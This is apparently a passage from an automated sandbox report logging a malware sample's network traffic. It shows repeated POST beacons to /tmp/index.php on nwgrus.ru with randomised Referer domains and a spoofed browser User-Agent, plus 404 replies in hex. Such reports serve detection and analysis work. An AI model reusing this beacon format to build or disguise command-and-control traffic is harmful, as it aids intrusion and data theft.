      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hykquqealhec.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wcfowkxogmtykxos.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxgxdupfkhdkpgcd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrowxfwdtnqpxb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://shukyhyxsnyt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oytavkgbvwgngwdq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcthmhytlnkrqkwa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://irmipcatkrgbgkn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxjsppdhykfhkdy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmcfxulhyyb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nhfvlqknfjyv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdpqwaweroenq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qymlmmmarfrlf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sjchoqywbhy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lfpsmslcgfbr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vpqrqumkciggjbf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yprnusgmnhodqa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwgseaeonxo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lxdpanclboemkjpp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxrdkpxlrlca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:02:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 04:03:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 